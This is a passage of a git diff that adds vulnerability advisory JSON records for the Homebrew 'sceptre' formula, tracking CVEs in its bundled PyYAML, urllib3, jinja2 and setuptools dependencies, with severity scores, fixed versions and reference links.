"key": "pkg:pypi/pyyaml@6.0.3", + "resource": "pyyaml" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pyyaml", + "subject_version": "6.0.3", + "key": "pkg:pypi/pyyaml@6.0.3", + "resource": "pyyaml" + } + ] + }, + "summary": "Deserialization of Untrusted Data in PyYAML", + "details": "PyYAML 5.1 through 5.1.2 has insufficient restrictions on the load and load_all functions because of a class deserialization issue, e.g., Popen is a class in the subprocess module. NOTE: this issue exists because of an incomplete fix for CVE-2017-18342.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-20477" + }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-3pqx-4fqf-j49f" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pyyaml/PYSEC-2020-176.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/yaml/pyyaml" + }, + { + "type": "WEB", + "url": "https://github.com/yaml/pyyaml/blob/master/CHANGES" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/33VBUY73AA6CTTYL3LRWHNFDULV7PFPN" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/52N5XS73Z5S4ZN7I7R56ICCPCTKCUV4H" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/download/47655" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2020-14343.json b/advisories/BREW-sceptre-CVE-2020-14343.json new file mode 100644 index 00000000000..deb0d5f6967 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2020-14343.json @@ -0,0 +1,125 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2020-14343", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-8q59-q68h-6hv4", + "CVE-2020-14343", + "PYSEC-2021-142" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "5.4", + "resource": "pyyaml", + "resource_purl": "pkg:pypi/pyyaml@6.0.3" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pyyaml", + "subject_version": "6.0.3", + "key": "pkg:pypi/pyyaml@6.0.3", + "resource": "pyyaml" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pyyaml", + "subject_version": "6.0.3", + "key": "pkg:pypi/pyyaml@6.0.3", + "resource": "pyyaml" + } + ] + }, + "summary": "Improper Input Validation in PyYAML", + "details": "A vulnerability was discovered in the PyYAML library in versions before 5.4, where it is susceptible to arbitrary code execution when it processes untrusted YAML files through the full_load method or with the FullLoader loader. Applications that use the library to process untrusted input may be vulnerable to this flaw. This flaw allows an attacker to execute arbitrary code on the system by abusing the python/object/new constructor. This flaw is due to an incomplete fix for CVE-2020-1747.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-14343" + }, + { + "type": "WEB", + "url": "https://github.com/SeldonIO/seldon-core/issues/2252" + }, + { + "type": "WEB", + "url": "https://github.com/yaml/pyyaml/issues/420" + }, + { + "type": "WEB", + "url": "https://github.com/yaml/pyyaml/issues/420#issuecomment-663673966" + }, + { + "type": "WEB", + "url": "https://github.com/yaml/pyyaml/commit/a001f2782501ad2d24986959f0239a354675f9dc" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1860466" + }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-8q59-q68h-6hv4" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pyyaml/PYSEC-2021-142.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/yaml/pyyaml" + }, + { + "type": "WEB", + "url": "https://pypi.org/project/PyYAML" + }, + { + "type": "WEB", + "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" + }, + { + "type": "WEB", + "url": "https://www.oracle.com/security-alerts/cpujul2022.html" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2020-1747.json b/advisories/BREW-sceptre-CVE-2020-1747.json new file mode 100644 index 00000000000..4ce2a53f9f0 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2020-1747.json @@ -0,0 +1,145 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2020-1747", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-6757-jp84-gxfx", + "CVE-2020-1747", + "PYSEC-2020-96" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "5.3.1", + "resource": "pyyaml", + "resource_purl": "pkg:pypi/pyyaml@6.0.3" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pyyaml", + "subject_version": "6.0.3", + "key": "pkg:pypi/pyyaml@6.0.3", + "resource": "pyyaml" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pyyaml", + "subject_version": "6.0.3", + "key": "pkg:pypi/pyyaml@6.0.3", + "resource": "pyyaml" + } + ] + }, + "summary": "Improper Input Validation in PyYAML", + "details": "A vulnerability was discovered in the PyYAML library in versions before 5.3.1, where it is susceptible to arbitrary code execution when it processes untrusted YAML files through the full_load method or with the FullLoader loader. Applications that use the library to process untrusted input may be vulnerable to this flaw. An attacker could use this flaw to execute arbitrary code on the system by abusing the python/object/new constructor.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-1747" + }, + { + "type": "WEB", + "url": "https://github.com/github/advisory-database/pull/4942" + }, + { + "type": "WEB", + "url": "https://github.com/yaml/pyyaml/pull/386" + }, + { + "type": "WEB", + "url": "https://github.com/yaml/pyyaml/commit/0cedb2a0697b2bc49e4f3841b8d4590b6b15657e" + }, + { + "type": "WEB", + "url": "https://github.com/yaml/pyyaml/commit/5080ba513377b6355a0502104846ee804656f1e0" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1747" + }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-6757-jp84-gxfx" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pyyaml/PYSEC-2020-96.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/yaml/pyyaml" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7PPAS6C4SZRDQLR7C22A5U3QOLXY33JX" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/K5HEPD7LEVDPCITY5IMDYWXUMX37VFMY" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMQXSZXNJT6ERABJZAAICI3DQSQLCP3D" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WORRFHPQVAFKKXXWLSSW6XKUYLWM6CSH" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZBJA3SGNJKCAYPSHOHWY3KBCWNM5NYK2" + }, + { + "type": "WEB", + "url": "https://www.oracle.com/security-alerts/cpujul2022.html" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00017.html" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00017.html" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2020-26137.json b/advisories/BREW-sceptre-CVE-2020-26137.json new file mode 100644 index 00000000000..88062cb9b42 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2020-26137.json @@ -0,0 +1,121 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2020-26137", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-wqvq-5m8c-6g24", + "CVE-2020-26137", + "PYSEC-2020-148" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "1.25.9", + "resource": "urllib3", + "resource_purl": "pkg:pypi/urllib3@2.7.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + } + ] + }, + "summary": "CRLF injection in urllib3", + "details": "urllib3 before 1.25.9 allows CRLF injection if the attacker controls the HTTP request method, as demonstrated by inserting CR and LF control characters in the first argument of `putrequest()`. NOTE: this is similar to CVE-2020-26116.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26137" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/pull/1800" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/commit/1dd69c5c5982fae7c87a620d487c2ebf7a6b436b" + }, + { + "type": "WEB", + "url": "https://bugs.python.org/issue39603" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2020-148.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/urllib3/urllib3" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00015.html" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00012.html" + }, + { + "type": "WEB", + "url": "https://usn.ubuntu.com/4570-1" + }, + { + "type": "WEB", + "url": "https://www.oracle.com/security-alerts/cpujul2022.html" + }, + { + "type": "WEB", + "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2020-28493.json b/advisories/BREW-sceptre-CVE-2020-28493.json new file mode 100644 index 00000000000..1ac56071892 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2020-28493.json @@ -0,0 +1,118 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2020-28493", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-g3rq-g295-4j3m", + "CVE-2020-28493", + "PYSEC-2021-66", + "SNYK-PYTHON-JINJA2-1012994" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.11.3", + "resource": "jinja2", + "resource_purl": "pkg:pypi/jinja2@3.1.6" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "jinja2", + "subject_version": "3.1.6", + "key": "pkg:pypi/jinja2@3.1.6", + "resource": "jinja2" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "jinja2", + "subject_version": "3.1.6", + "key": "pkg:pypi/jinja2@3.1.6", + "resource": "jinja2" + } + ] + }, + "summary": "Regular Expression Denial of Service (ReDoS) in Jinja2", + "details": "This affects the package jinja2 from 0.0.0 and before 2.11.3. The ReDOS vulnerability of the regex is mainly due to the sub-pattern [a-zA-Z0-9._-]+.[a-zA-Z0-9._-]+ This issue can be mitigated by Markdown to format user content instead of the urlize filter, or by implementing request timeouts and limiting process memory.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28493" + }, + { + "type": "WEB", + "url": "https://github.com/pallets/jinja/pull/1343" + }, + { + "type": "WEB", + "url": "https://github.com/pallets/jinja/commit/15ef8f09b659f9100610583938005a7a10472d4d" + }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-g3rq-g295-4j3m" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pallets/jinja" + }, + { + "type": "WEB", + "url": "https://github.com/pallets/jinja/blob/ab81fd9c277900c85da0c322a2ff9d68a235b2e6/src/jinja2/utils.py%23L20" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/jinja2/PYSEC-2021-66.yaml" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVAKCOO7VBVUBM3Q6CBBTPBFNP5NDXF4" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202107-19" + }, + { + "type": "WEB", + "url": "https://snyk.io/vuln/SNYK-PYTHON-JINJA2-1012994" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2020-7212.json b/advisories/BREW-sceptre-CVE-2020-7212.json new file mode 100644 index 00000000000..d27f61ac148 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2020-7212.json @@ -0,0 +1,105 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2020-7212", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-hmv2-79q8-fv6g", + "CVE-2020-7212", + "PYSEC-2020-149" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "1.25.8", + "resource": "urllib3", + "resource_purl": "pkg:pypi/urllib3@2.7.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + } + ] + }, + "summary": "Uncontrolled Resource Consumption in urllib3", + "details": "The _encode_invalid_chars function in util/url.py in the urllib3 library 1.25.2 through 1.25.7 for Python allows a denial of service (CPU consumption) because of an inefficient algorithm. The percent_encodings array contains all matches of percent encodings. It is not deduplicated. For a URL of length N, the size of percent_encodings may be up to O(N). The next step (normalize existing percent-encoded bytes) also takes up to O(N) for each step, so the total time is O(N^2). If percent_encodings were deduplicated, the time to compute _encode_invalid_chars would be O(kN), where k is at most 484 ((10+6*2)^2).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7212" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/commit/a74c9cfbaed9f811e7563cfc3dce894928e0221a" + }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-hmv2-79q8-fv6g" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2020-149.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/urllib3/urllib3" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/blob/master/CHANGES.rst" + }, + { + "type": "WEB", + "url": "https://pypi.org/project/urllib3/1.25.8" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2021-28363.json b/advisories/BREW-sceptre-CVE-2021-28363.json new file mode 100644 index 00000000000..17f7675d9e8 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2021-28363.json @@ -0,0 +1,137 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2021-28363", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-5phf-pp7p-vc2r", + "CVE-2021-28363", + "PYSEC-2021-59" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "1.26.4", + "resource": "urllib3", + "resource_purl": "pkg:pypi/urllib3@2.7.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + } + ] + }, + "summary": "Using default SSLContext for HTTPS requests in an HTTPS proxy doesn't verify certificate hostname for proxy connection", + "details": "### Impact\n\nUsers who are using an HTTPS proxy to issue HTTPS requests and haven't configured their own SSLContext via `proxy_config`.\nOnly the default SSLContext is impacted.\n\n### Patches\n\n[urllib3 >=1.26.4 has the issue resolved](https://github.com/urllib3/urllib3/releases/tag/1.26.4). urllib3<1.26 is not impacted due to not supporting HTTPS requests via HTTPS proxies.\n\n### Workarounds\n\nUpgrading is recommended as this is a minor release and not likely to break current usage.\n\nConfiguring an `SSLContext` with `check_hostname=True` and passing via `proxy_config` instead of relying on the default `SSLContext`\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at [sethmichaellarson@gmail.com](mailto:sethmichaellarson@gmail.com)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-5phf-pp7p-vc2r" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28363" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/commit/8d65ea1ecf6e2cdc27d42124e587c1b83a3118b0" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2021-59.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-db/tree/main/vulns/urllib3/PYSEC-2021-59.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/urllib3/urllib3" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/blob/main/CHANGES.rst#1264-2021-03-15" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/commits/main" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/releases/tag/1.26.4" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4S65ZQVZ2ODGB52IC7VJDBUK4M5INCXL" + }, + { + "type": "WEB", + "url": "https://pypi.org/project/urllib3/1.26.4" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202107-36" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202305-02" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240621-0007" + }, + { + "type": "WEB", + "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2021-33503.json b/advisories/BREW-sceptre-CVE-2021-33503.json new file mode 100644 index 00000000000..1900f301fc0 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2021-33503.json @@ -0,0 +1,121 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2021-33503", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-q2q7-5pp4-w6pg", + "CVE-2021-33503", + "PYSEC-2021-108" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "1.26.5", + "resource": "urllib3", + "resource_purl": "pkg:pypi/urllib3@2.7.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + } + ] + }, + "summary": "Catastrophic backtracking in URL authority parser when passed URL containing many @ characters", + "details": "### Impact\n\nWhen provided with a URL containing many `@` characters in the authority component the authority regular expression exhibits catastrophic backtracking causing a denial of service if a URL were passed as a parameter or redirected to via an HTTP redirect.\n\n\n### Patches\n\nThe issue has been fixed in urllib3 v1.26.5.\n\n### References\n\n- [CVE-2021-33503](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33503)\n- [JVNVU#92413403 (English)](https://jvn.jp/en/vu/JVNVU92413403/)\n- [JVNVU#92413403 (Japanese)](https://jvn.jp/vu/JVNVU92413403/)\n- [urllib3 v1.26.5](https://github.com/urllib3/urllib3/releases/tag/1.26.5)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Ask in our [community Discord](https://discord.gg/urllib3)\n* Email [sethmichaellarson@gmail.com](mailto:sethmichaellarson@gmail.com)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-q2q7-5pp4-w6pg" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-33503" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/commit/2d4a3fee6de2fa45eb82169361918f759269b4ec" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/commit/5b047b645f5f93900d5e2fc31230848c25eb1f5f#diff-52026d639119bf1e0364836b4e8a18bd9ed3c95c6ba39b26534a5057a65e35bbR65" + }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-q2q7-5pp4-w6pg" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2021-108.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/urllib3/urllib3" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6SCV7ZNAHS3E6PBFLJGENCDRDRWRZZ6W" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FMUGWEAUYGGHTPPXT6YBD53WYXQGVV73" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202107-36" + }, + { + "type": "WEB", + "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2022-40897.json b/advisories/BREW-sceptre-CVE-2022-40897.json new file mode 100644 index 00000000000..9c8dc1299f4 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2022-40897.json @@ -0,0 +1,138 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2022-40897", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-r9hx-vwmv-q579", + "BIT-setuptools-2022-40897", + "CVE-2022-40897", + "PYSEC-2022-43012" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "65.5.1", + "resource": "setuptools", + "resource_purl": "pkg:pypi/setuptools@83.0.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "setuptools", + "subject_version": "83.0.0", + "key": "pkg:pypi/setuptools@83.0.0", + "resource": "setuptools" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "setuptools", + "subject_version": "83.0.0", + "key": "pkg:pypi/setuptools@83.0.0", + "resource": "setuptools" + } + ] + }, + "summary": "pypa/setuptools vulnerable to Regular Expression Denial of Service (ReDoS)", + "details": "Python Packaging Authority (PyPA)'s setuptools is a library designed to facilitate packaging Python projects. Setuptools version 65.5.0 and earlier could allow remote attackers to cause a denial of service by fetching malicious HTML from a PyPI package or custom PackageIndex page due to a vulnerable Regular Expression in `package_index`. This has been patched in version 65.5.1.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-40897" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/setuptools/issues/3659" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/setuptools/commit/43a9c9bfa6aa626ec2a22540bea28d2ca77964be" + }, + { + "type": "WEB", + "url": "https://setuptools.pypa.io/en/latest" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240621-0006" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20230214-0001" + }, + { + "type": "WEB", + "url": "https://pyup.io/vulnerabilities/CVE-2022-40897/52495" + }, + { + "type": "WEB", + "url": 